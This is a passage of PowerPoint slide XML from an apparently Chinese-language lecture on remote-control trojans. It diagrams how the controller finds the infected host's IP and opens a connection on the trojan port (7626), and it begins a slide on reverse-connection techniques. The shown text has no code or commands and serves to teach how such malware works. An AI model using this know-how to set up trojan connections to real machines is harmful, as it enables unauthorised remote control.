              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 289722"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert" wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26628" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>建立连接</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26629" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3417888" y="1995488"/>
            <a:ext cx="936625" cy="504825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26630" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3346450" y="1420813"/>
            <a:ext cx="1103313" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>控制端</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26631" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7162800" y="1995488"/>
            <a:ext cx="936625" cy="504825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26632" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7091363" y="1420813"/>
            <a:ext cx="1103312" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>服务端</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26633" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3417888" y="4710113"/>
            <a:ext cx="936625" cy="504825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26634" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7234238" y="4710113"/>
            <a:ext cx="936625" cy="504825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26635" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4305300" y="4783138"/>
            <a:ext cx="625475" cy="336550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="54000" tIns="10800" rIns="54000" bIns="10800">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
              <a:t>1037</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26636" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6630988" y="4783138"/>
            <a:ext cx="625475" cy="336550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="54000" tIns="10800" rIns="54000" bIns="10800">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
              <a:t>7626</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26637" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6557963" y="2068513"/>
            <a:ext cx="625475" cy="336550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="54000" tIns="10800" rIns="54000" bIns="10800">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
              <a:t>7626</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26638" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3130550" y="5246688"/>
            <a:ext cx="1568450" cy="327025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="54000" tIns="10800" rIns="54000" bIns="10800">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
              <a:t>202.102.47.56</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26639" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6548438" y="5286375"/>
            <a:ext cx="1695450" cy="327025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="54000" tIns="10800" rIns="54000" bIns="10800">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
              <a:t>202.102.96.101</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26640" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3146425" y="2571750"/>
            <a:ext cx="1568450" cy="327025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="54000" tIns="10800" rIns="54000" bIns="10800">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
              <a:t>202.102.47.56</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26641" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="701675" y="2090738"/>
            <a:ext cx="2071688" cy="387350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="54000" tIns="10800" rIns="54000" bIns="10800">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>建立连接前</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26642" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="684213" y="3459163"/>
            <a:ext cx="2376487" cy="387350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="54000" tIns="10800" rIns="54000" bIns="10800">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>获取服务端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26643" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="684213" y="4821238"/>
            <a:ext cx="2378075" cy="387350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="54000" tIns="10800" rIns="54000" bIns="10800">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>木马连接建立</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26644" name="Text Box 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4570413" y="3275013"/>
            <a:ext cx="2674937" cy="641350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="54000" tIns="10800" rIns="54000" bIns="10800">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:latin typeface="黑体" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>通过信息反馈或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:latin typeface="黑体" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:latin typeface="黑体" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:latin typeface="黑体" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>获得服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:latin typeface="黑体" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:latin typeface="黑体" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26645" name="Text Box 20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5219700" y="1563688"/>
            <a:ext cx="1206500" cy="396875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>木马端口</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26646" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6156325" y="1924050"/>
            <a:ext cx="360363" cy="215900"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26647" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6516688" y="5559425"/>
            <a:ext cx="1716087" cy="396875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>（服务端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26648" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3000375" y="5541963"/>
            <a:ext cx="1716088" cy="396875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>（控制端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26649" name="Text Box 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4859338" y="5181600"/>
            <a:ext cx="1206500" cy="396875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>服务端口</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26650" name="Line 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5003800" y="5037138"/>
            <a:ext cx="288925" cy="215900"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15868918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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>远程控制木马的反弹技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28676" name="Picture 3" descr="787"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2411413" y="1728788"/>
            <a:ext cx="1223962" cy="1062037"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28677" name="Picture 4" descr="were"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6300788" y="1584325"/>
            <a:ext cx="1120775" cy="1366838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
